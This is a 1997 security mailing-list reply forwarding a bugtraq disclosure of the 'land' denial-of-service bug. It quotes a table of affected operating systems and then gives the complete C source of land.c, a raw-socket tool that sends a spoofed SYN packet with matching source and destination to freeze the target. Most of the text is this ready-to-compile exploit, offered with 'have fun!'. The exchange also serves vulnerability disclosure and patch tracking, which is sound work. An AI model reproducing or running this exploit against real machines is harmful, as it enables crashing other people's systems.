Subject: Re: "LAND" Attack Update (fwd)
To: Jeff Thieleke <thieleke@ix.netcom.com>
From: Paul B Dokas <dokas@cs.umn.edu>
List: tech-security
Date: 11/20/1997 21:44:40
On Thu, 20 Nov 1997, Jeff Thieleke wrote:
> > This test where againts the "land" attack. This is _NOT_ about "teardrop".
> >
> > BSDI 2.1 (vanilla) IS vulnerable
> > BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable
> > BSDI 3.0 NOT vulnerable
> > Digital UNIX 4.0 NOT vulnerable
> > FreeBSD 2.2.2-RELEASE IS vulnerable
> > FreeBSD 2.2.5-RELEASE IS vulnerable
> > FreeBSD 2.2.5-STABLE IS vulnerable
> > FreeBSD 3.0-CURRENT IS vulnerable
> > HP-UX 10.20 IS vulnerable
> > IRIX 6.2 NOT vulnerable
> > Linux 2.0.30 NOT vulnerable
> > Linux 2.0.32 NOT vulnerable
> > MacOS 8.0 IS vulnerable (TCP/IP stack crashed)
> > NetBSD 1.2 IS vulnerable
> ^^^^^^^^^^ ^^ ^^^^^^^^^^
> > NeXTSTEP 3.0 IS vulnerable
> > NeXTSTEp 3.1 IS vulnerable
> > Novell 4.11 NOT vulnerable
> > OpenBSD 2.1 IS vulnerable
> > OpenBSD 2.2 (Oct31) NOT vulnerable
> > SCO OpenServer 5.0.4 NOT vulnerable
> > Solaris 2.5.1 IS vulnerable (conflicting reports)
> > SunOS 4.1.4 IS vulnerable
> > Windows 95 (vanilla) IS vulnerable
> > Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable
>
> I must have missed it...what is the "land" attack, and does anyone know if
> NetBSD 1.3_ALPHA has been fixed?
>From bugtraq:
------------------------------CUT HERE------------------------------
>From owner-bugtraq@netspace.org Wed Nov 19 23:54:29 1997
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.3.96.971120193920.5942A-100000@lagged.net>
Date: Thu, 20 Nov 1997 19:40:19 -0500
Reply-To: m3lt <meltman@lagged.net>
From: m3lt <meltman@lagged.net>
Subject: new TCP/IP bug in win95
To: BUGTRAQ@netspace.org
Status: RO
hi,
i recently discovered a bug which freezes win95 boxes. here's how
it works: send a spoofed packet with the SYN flag set from a host, on an open
port (such as 113 or 139), setting as source the SAME host and port
(ie: 10.0.0.1:139 to 10.0.0.1:139). this will cause the win95 machine to lock
up.
the piece of code included in this message does that, so... have fun!
i haven't tested this bug on other platforms, i don't have the
ressources. please feel free to do so.
m3lt
meltman@lagged.net
--- snip snip -----------------------------------------------------------
/* land.c by m3lt, FLC
crashes a win95 box */
#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
struct pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;
for(i=0;i<(length>>1);i++)
value+=data[i];
if((length&1)==1)
value+=(data[i]<<8);
value=(value&65535)+(value>>16);
return(~value);
}
int main(int argc,char * * argv)
{
struct sockaddr_in sin;
struct hostent * hoste;
int sock;
char buffer[40];
struct iphdr * ipheader=(struct iphdr *) buffer;
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
struct pseudohdr pseudoheader;
fprintf(stderr,"land.c by m3lt, FLC\n");
if(argc<3)
{
fprintf(stderr,"usage: %s IP port\n",argv[0]);
return(-1);
}
bzero(&sin,sizeof(struct sockaddr_in));
sin.sin_family=AF_INET;
if((hoste=gethostbyname(argv[1]))!=NULL)
bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
{
fprintf(stderr,"unknown host %s\n",argv[1]);
return(-1);
}
if((sin.sin_port=htons(atoi(argv[2])))==0)
{
fprintf(stderr,"unknown port %s\n",argv[2]);
return(-1);
}
if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
fprintf(stderr,"couldn't allocate raw socket\n");
return(-1);
}
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=sizeof(struct iphdr)/4;
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->ttl=255;
ipheader->protocol=IP_TCP;
ipheader->saddr=sin.sin_addr.s_addr;
ipheader->daddr=sin.sin_addr.s_addr;
tcpheader->th_sport=sin.sin_port;
tcpheader->th_dport=sin.sin_port;
tcpheader->th_seq=htonl(0xF1C);
tcpheader->th_flags=TH_SYN;
tcpheader->th_off=sizeof(struct tcphdr)/4;
tcpheader->th_win=htons(2048);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol=6;
pseudoheader.length=htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
{
fprintf(stderr,"couldn't send packet\n");
return(-1);
}
fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);
close(sock);
return(0);
}
--- snip snip -----------------------------------------------------------
------------------------------CUT HERE------------------------------
--
Paul Dokas dokas@cs.umn.edu
======================================================================
Don Juan Matus: "an enigma wrapped in mystery wrapped in a tortilla."